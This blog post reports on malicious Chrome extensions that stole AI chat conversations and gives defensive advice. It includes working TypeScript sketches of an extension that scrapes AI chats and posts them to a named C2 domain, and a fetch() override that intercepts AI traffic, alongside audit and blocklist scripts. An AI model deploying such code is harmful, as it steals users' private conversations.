Malicious Chrome Extensions Steal AI Chats: How to Protect Your Conversations in 2026

Published: January 2, 2026 at 08:01 PM EST
5 min read
Source: Dev.to

What Happened in the 900K AI‑Chat Theft Campaign?

  • Two malicious Chrome extensions pretended to be legitimate AI‑assistant tools and silently stole users’ AI conversations and browsing data.
  • They targeted popular AI platforms such as ChatGPT, DeepSeek, and Perplexity, and were even listed in the Chrome Web Store.
  • The campaign was uncovered by OX Security in late 2025.
  • The fake extensions copied the look‑and‑feel of AITOPIA, a real AI‑sidebar extension.
  • Once installed, they scraped AI chats directly from the browser and exfiltrated the data to attacker‑controlled servers every 30 minutes.
  • One of the rogue extensions displayed Google’s “Featured” badge, which normally signals compliance with security and UX best practices.
  • This badge made the extension appear especially trustworthy to non‑technical users.
  • Together, the two extensions amassed over 900,000 downloads.
  • OX Security reported them to Google on December 29, 2025, but the extensions remained available at least through December 30, 2025.
  • Takeaway: Even “Featured” or “Recommended” extensions cannot be assumed safe when handling sensitive AI content.

How These Malicious AI Extensions Actually Work

Step‑by‑Step: From Install to Exfiltration

  1. Unique tracking ID created – The extension generates a unique user ID and begins tracking your browsing sessions.

  2. Monitoring tabs & URLs – Using Chrome’s tabs APIs, it watches for visits to ChatGPT, DeepSeek, or other AI tools and records active‑tab URLs (exposing research topics, internal tools, query parameters, etc.).

  3. Scraping AI conversations from the DOM – When you’re on an AI‑chat page, the extension reads the Document Object Model (DOM) and extracts both your prompts and the AI’s responses.

  4. Encoding & sending the data out – The stolen data is Base64‑encoded and posted to command‑and‑control servers such as:

    deepaichats.com
    chatsaigpt.com

    Uploads are batched and sent roughly every 30 minutes to blend in with normal traffic (the full flow is sketched after this list).

  5. Silent updates keep the attack alive – Extensions can receive automatic updates that add or modify malicious behavior without any user approval. This “sleeper‑agent” pattern lets a harmless‑looking extension turn dangerous months later.
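
To make these steps concrete, here is a minimal sketch of how the reported install‑to‑exfiltration flow maps onto standard Manifest V3 extension APIs. The C2 domain comes from the report; the AI_HOSTS list, the endpoint path, and the helper names are illustrative assumptions, not code recovered from the actual extensions.

```typescript
// Illustrative sketch only (Manifest V3 background service worker).
// AI_HOSTS, the endpoint path, and helper names are assumptions; the C2
// domain is from the report. Requires "tabs", "scripting", "storage",
// "alarms", and host permissions in the manifest.
const AI_HOSTS = ["chatgpt.com", "chat.deepseek.com", "www.perplexity.ai"];
const C2_ENDPOINT = "https://deepaichats.com/upload"; // path is hypothetical

// Step 1: a per-install tracking ID, persisted in extension storage.
async function getTrackingId(): Promise<string> {
  const { id } = await chrome.storage.local.get("id");
  if (typeof id === "string") return id;
  const fresh = crypto.randomUUID();
  await chrome.storage.local.set({ id: fresh });
  return fresh;
}

// In-memory batch (a real extension would persist this across
// service-worker restarts).
const pendingChats: string[] = [];

// Steps 2-3: watch tab navigations and scrape chat text from AI pages.
chrome.tabs.onUpdated.addListener(async (tabId, changeInfo, tab) => {
  if (changeInfo.status !== "complete" || !tab.url) return;
  if (!AI_HOSTS.some((host) => tab.url!.includes(host))) return;
  const [injection] = await chrome.scripting.executeScript({
    target: { tabId },
    func: () => document.body.innerText, // crude DOM scrape: prompts + responses
  });
  if (typeof injection?.result === "string") pendingChats.push(injection.result);
});

// Step 4: batch uploads every 30 minutes to blend in with normal traffic.
chrome.alarms.create("exfil", { periodInMinutes: 30 });
chrome.alarms.onAlarm.addListener(async (alarm) => {
  if (alarm.name !== "exfil" || pendingChats.length === 0) return;
  // Base64-encode the batch (UTF-8 handled via the classic escape trick).
  const payload = btoa(unescape(encodeURIComponent(pendingChats.join("\n"))));
  pendingChats.length = 0;
  await fetch(C2_ENDPOINT, {
    method: "POST",
    body: JSON.stringify({ id: await getTrackingId(), data: payload }),
  });
});
```

Nothing here requires an exploit: every call is a documented extension API, which is why permission review matters more than malware signatures.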

Why AI Conversations Are a Goldmine

AI chats contain rich, structured data that attackers can monetize:

  • Product roadmaps, business strategies, or customer data
  • Source code and internal architecture details (developers)
  • Clinical summaries or protocol‑related notes (research staff, even if de‑identified)

In 2026’s AI‑cybersecurity landscape, such data is a prime target.

The Free VPN & “Privacy” Extension Problem

  • In December 2025, Koi Security revealed several free VPN and privacy‑related Chrome/Edge extensions (more than 8 million combined downloads) that captured AI conversations.
  • Extensions like Urban VPN Proxy intercepted chats from ChatGPT, Claude, Gemini, Copilot, Perplexity, DeepSeek, Grok, and others.
  • Embedded JavaScript overrode core browser functions (fetch(), XMLHttpRequest) to intercept user inputs and AI responses in real time (a sketch of this technique appears below).
  • Some of these extensions also carried the “Featured” badge.

Result: Users installed these extensions to increase privacy, but their AI conversations were monetized and logged without clear consent.
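
The fetch()/XMLHttpRequest override is plain monkey‑patching of page globals. Here is a minimal sketch of the fetch() half of the technique; the URL pattern and the logIntercepted sink are hypothetical stand‑ins for whatever matching and exfiltration logic the real extensions used.

```typescript
// Sketch of a fetch() override injected into the page. The page keeps
// working normally; the wrapper silently copies matching traffic first.
// AI_API_PATTERN and logIntercepted are illustrative, not recovered code.
const AI_API_PATTERN = /chatgpt|claude|gemini|copilot|perplexity|deepseek|grok/i;
const originalFetch = window.fetch;

window.fetch = async (input: RequestInfo | URL, init?: RequestInit) => {
  const url =
    typeof input === "string" ? input : input instanceof URL ? input.href : input.url;
  const response = await originalFetch(input, init);
  if (AI_API_PATTERN.test(url)) {
    // Clone so reading the body does not consume the page's copy.
    response.clone().text()
      .then((body) => logIntercepted({ url, request: init?.body ?? null, response: body }))
      .catch(() => { /* ignore unreadable bodies */ });
  }
  return response;
};

// Hypothetical sink: a malicious script would exfiltrate instead of logging.
function logIntercepted(record: { url: string; request: unknown; response: string }) {
  console.debug("intercepted AI traffic", record);
}
```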

Enterprise Extension Risk

A 2025 enterprise browser‑extension security report showed:

| Metric | Finding |
| --- | --- |
| Extension adoption | 99% of enterprise users have at least one browser extension installed |
| Extension count | More than 50% run more than 10 extensions simultaneously |
| High‑risk permissions | 53% have at least one extension with “high” or “critical” permission scopes (access to cookies, passwords, browsing data, full page contents) |

For organizations that rely on AI‑powered productivity—from clinical research sites to software teams—this means nearly every employee is a potential attack vector via browser extensions.

Why This Matters for Professionals Using AI Every Day

If you’re a web developer, clinical researcher, or knowledge worker who uses AI as a core tool, these attacks directly affect:

  • Work output (stolen code, drafts, or analyses)
  • Compliance obligations (HIPAA, GDPR, corporate policies)
  • Patient or client confidentiality

High‑Risk Use Cases

You are especially vulnerable when you:

  • Paste internal code, credentials, or infrastructure details into ChatGPT, DeepSeek, or Perplexity.
  • Summarize internal SOPs, study protocols, or regulatory documents inside AI tools.
  • Use AI to draft agreements, HR decisions, or other sensitive corporate material.

Building Safer AI Workflows (usebetterai.com‑style Practices)

  1. Audit installed extensions – Regularly review and remove any extensions you don’t actively need, especially those with broad permissions (see the audit sketch after this list).
  2. Prefer “Verified” over “Featured” – Look for extensions that have undergone third‑party security audits or are published by reputable vendors.
  3. Apply the principle of least privilege – Disable or restrict extensions that request “read and change all your data on the websites you visit” unless absolutely necessary.
  4. Use isolated browser profiles – Keep AI‑assistant tools in a dedicated profile with no extra extensions installed.
  5. Leverage enterprise‑grade extension management – Deploy a whitelist of approved extensions via your organization’s policy engine (e.g., Chrome Enterprise policies).
  6. Monitor network traffic – Set up alerts for outbound connections to unknown domains (e.g., *.deepaichats.com, *.chatsaigpt.com).
  7. Encrypt AI prompts locally – When possible, encrypt sensitive prompts before sending them to the AI service, or use on‑premises LLMs so that sensitive data never leaves your network.
  8. Educate teams – Conduct regular security briefings on the risks of browser extensions and safe AI‑tool usage.
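
To make items 1 and 3 actionable: Chrome’s chrome.management API can enumerate what is installed and flag broad grants. Below is a minimal audit sketch; it must run inside an extension that holds the “management” permission, and the RISKY_PERMISSIONS and BROAD_HOSTS lists are judgment calls you should tune.

```typescript
// Minimal extension-audit sketch: list installed extensions and flag those
// with high-risk API permissions or broad host access. Requires the
// "management" permission; the two lists below are tunable assumptions.
const RISKY_PERMISSIONS = ["cookies", "history", "webRequest", "tabs", "scripting"];
const BROAD_HOSTS = ["<all_urls>", "*://*/*", "http://*/*", "https://*/*"];

chrome.management.getAll((extensions) => {
  for (const ext of extensions) {
    if (!ext.enabled || ext.type !== "extension") continue;
    const riskyApis = (ext.permissions ?? []).filter((p) => RISKY_PERMISSIONS.includes(p));
    const broadHosts = (ext.hostPermissions ?? []).filter((h) => BROAD_HOSTS.includes(h));
    if (riskyApis.length > 0 || broadHosts.length > 0) {
      console.warn(`Review “${ext.name}” (${ext.id})`, { riskyApis, broadHosts });
    }
  }
});
```

Run it periodically (or from chrome.alarms) and route the warnings into whatever reporting channel your team already uses.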

Quick Checklist

  • Review all Chrome/Edge extensions and remove unnecessary ones.
  • Verify each remaining extension’s publisher and permission set.
  • Enable “Enterprise‑approved extensions only” policy if you manage a fleet.
  • Set up DNS/URL filtering for known malicious C2 domains (a log‑scanning sketch follows this checklist).
  • Conduct quarterly security awareness training on AI‑related threats.
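
For the DNS/URL‑filtering item, even a simple log scan catches beacons to known C2 domains. Here is a minimal Node.js sketch, assuming a plain‑text resolver or proxy log with one queried hostname per line; the log path is a placeholder, and the blocklist holds the domains named in the reports.

```typescript
// Minimal C2-domain alerting sketch for DNS or proxy logs.
// Assumes one queried hostname per log line; the path is a placeholder.
import { createReadStream } from "node:fs";
import { createInterface } from "node:readline";

const BLOCKLIST = ["deepaichats.com", "chatsaigpt.com"]; // domains from the reports

async function scanLog(path: string): Promise<void> {
  const lines = createInterface({ input: createReadStream(path) });
  for await (const line of lines) {
    const hit = BLOCKLIST.find((domain) => line.includes(domain));
    if (hit) console.warn(`ALERT: outbound lookup matching ${hit}: ${line.trim()}`);
  }
}

scanLog("/var/log/dns/queries.log").catch(console.error);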

Bottom line: Browser extensions, even those that appear “Featured” or privacy‑focused, can become silent data‑theft channels for AI conversations. By auditing extensions, tightening permissions, and adopting a security‑first AI workflow, you can protect your intellectual property, your compliance posture, and the privacy of the people you serve.

What Attackers Gain from Scraped Conversations

When malicious extensions scrape AI conversations, they gain:

  • Internal naming conventions, URLs, and system structures.
  • Business strategy and research plans.
  • Potentially identifiable fragments that, when combined, may violate contracts or regulations.

As AI becomes a core productivity layer in 2026, attackers are following the data.

Read more at [usebetterai](https://usebetterai.com/malicious-chrome-extensions-steal-ai-chats-2026).